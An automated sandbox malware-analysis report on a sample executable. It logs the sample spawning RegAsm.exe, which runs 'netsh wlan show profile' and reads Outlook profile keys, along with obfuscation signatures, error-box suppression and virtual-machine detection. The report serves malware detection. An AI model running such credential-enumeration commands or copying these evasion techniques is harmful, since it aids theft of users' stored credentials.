Source: C:\Users\user\Desktop\bF7H5z6B1q.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\bF7H5z6B1q.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profileJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32Jump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
Checks if Microsoft Office is installedShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9554_none_d08d6fa2442aa556\MSVCR80.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: mscorrc.pdb source: RegAsm.exe, 0000000A.00000002.16917699549.0000000022D40000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_004085E3 push es; ret 3_2_004085E2
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_00408595 push es; ret 3_2_004085E2
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_0040859B push es; ret 3_2_004085E2
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_02BA5724 push ds; iretd 3_2_02BA5728
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_02BA5888 push FFFFFFB8h; iretd 3_2_02BA58CC
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_02BA3C18 push eax; retf 3_2_02BA3C1A
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeCode function: 3_2_02BA4557 push edx; ret 3_2_02BA455B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_011295ED push edi; ret 10_2_011295EE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01129614 push ebx; retf 10_2_0112961E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF4ED2 push eax; iretd 10_2_22CF4ED3
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF9C58 push eax; ret 10_2_22CF9C91
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF598F push esp; iretd 10_2_22CF5992
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF598B push esi; iretd 10_2_22CF598E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF5983 push esp; iretd 10_2_22CF598A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF599F push edx; iretd 10_2_22CF59A6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF599B push edi; iretd 10_2_22CF599E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF5993 push edi; iretd 10_2_22CF599A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF59A7 push ebp; iretd 10_2_22CF59AA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF59B3 push ebp; iretd 10_2_22CF59B6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF594B push edx; iretd 10_2_22CF594E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF595F push ebx; iretd 10_2_22CF5966
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF5953 push esi; iretd 10_2_22CF595A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF596F push esp; iretd 10_2_22CF5976
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF5967 push ebp; iretd 10_2_22CF596E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF1509 push ecx; retf 10_2_22CF151C
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF593F push esi; iretd 10_2_22CF5946
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF5933 push esp; iretd 10_2_22CF593A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22CF5930 push edi; iretd 10_2_22CF5932
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_22DE4A8A pushad ; ret 10_2_22DE4A8B

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\bF7H5z6B1q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_01124553 10_2_01124553
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
